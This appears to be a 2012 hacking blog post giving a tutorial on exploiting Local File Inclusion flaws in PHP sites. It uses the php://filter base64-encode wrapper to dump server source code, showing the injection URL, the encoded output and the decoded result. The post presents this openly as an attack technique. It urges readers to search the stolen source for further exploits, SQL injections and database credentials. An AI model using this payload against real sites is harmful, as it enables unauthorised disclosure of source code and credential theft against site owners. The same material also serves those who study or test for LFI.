LFI TIP: HOW TO READ SOURCE CODE USING PHP://FILTER ~ r00t@~SecurityVoid

Thursday 26 April 2012

LFI TIP: HOW TO READ SOURCE CODE USING PHP://FILTER

09:50 SecurityVoid No comments

LFI TIP: HOW TO READ SOURCE CODE USING PHP://FILTER

OK so you wont be able to shell a site everytime you find a LFI vulnerability. That being said doesn’t mean we still cant work on a few other methods and still manage to walk away with some valuable information. Today I will show you briefly another method which can be leveraged when you find an LFI vulnerability to get that job done through the use of php:// filters…

OK so you have found your LFI link but cant get access to logs or conditions aren’t right for gaining shell access:

OK, well before you give up and go report the site is only mildly vulnerable we will test further to see if we can read any of the target servers files. We will use a method to view the source of any PHP file through the use of the PHP filter wrapper function “php://filter/convert.base64_encode/resource=” which has been available since PHP 5.0.0. The syntax to use works like this:

SYNTAX:

http://www.site.com/vulnpage.php?page=php://filter/convert.base64-encode/resource=FileNameToRead

I should note that in most cases include function will append the “.php” to your FileNameToRead BUT in some cases you may need to define this in your injection by also including the file ending (.php). Through this method it forces PHP to base64 encode the target file before excecuting and then returning that encoding to us. We can then simply decode the results after this with our favorite tool and obtain the source code of the PHP files on the target site.

RETURNED RESULT:

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMC8vRU4iPgo8aHRtbD4KPGhlYWQ+CiAgPHRpdGxlPk15IEZpcnN0IFRlc3QgU2l0ZTwvdGl0bGU+CiAgPE1FVEEgSFRUUC1FUVVJVj0iUmVmcmVzaCIgQ09OVEVOVD0iMTsgVVJMPWh0dHA6Ly90ZXN0c2l0ZS5jb20vaW5kZXgucGhwIj4KPC9oZWFkPgo8Ym9keT4KPGRpdiBhbGlnbj0iY2VudGVyIj4KICAgIElmIHlvdSBhcmUgbm90IHJlZGlyZWN0ZWQgcGxlYXNlIGNsaWNrIDxhIGhyZWY9IiBodHRwOi8vdGVzdHNpdGUuY29tL2luZGV4LnBocCAiPmhlcmU8L2E+Lgo8L2Rpdj4KPC9ib2R5Pgo8L2h0bWw+

If we base64 decode the results, we see the actual source code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">

<html>

<head>

<title>My First Test Site</title>

</head>

<body>

If you are not redirected please click <a href=" http://testsite.com/index.php ">here</a>.

</div>

</body>

</html>

You can now go through source code to review for further code exploits, SQL injections, or enumerate for configuration files and try to grab juicy connection credentials. The options are up to you, but thought I would add this to the LFI series since I have not seen it discussed very much. Hope you were able to follow along and until next time…Enjoy!

credits-kaotic

Posted in: LFI

New spyeye plugin takes control crimware victims!

35,000 pwd's reset after bigpond gamearena gets hacked

New spyeye plugin takes control crimware victims!

Anonymous takes down supreme court of india and all india congress website's

Call of duty hacker jailed after meatspace heist

FBI-aims-to-pry-open-new-channels-for.html'>FBI Aims to pry open new channels for web surveillance

Backdoor sniffes in ZTEs US android smartphones

Anonymous hacks into bureau of justice and leaks 1.7GB data

Mozilla against CISPA

Bitcoin bank Bitcoinica still titsup after cyberheist

About Me

Thursday 26 April 2012

LFI TIP: HOW TO READ SOURCE CODE USING PHP://FILTER

LFI TIP: HOW TO READ SOURCE CODE USING PHP://FILTER

0 comments:

Post a Comment

Hits

Follow US

Hot Threads

Labels

Flag Counter

The art of human mind maniplulation

How to be a ghost on the internet

10 most powerful ways to stay anonymous online

WIndows Tricks

Check out for latest news about gadgets and reveiws as well!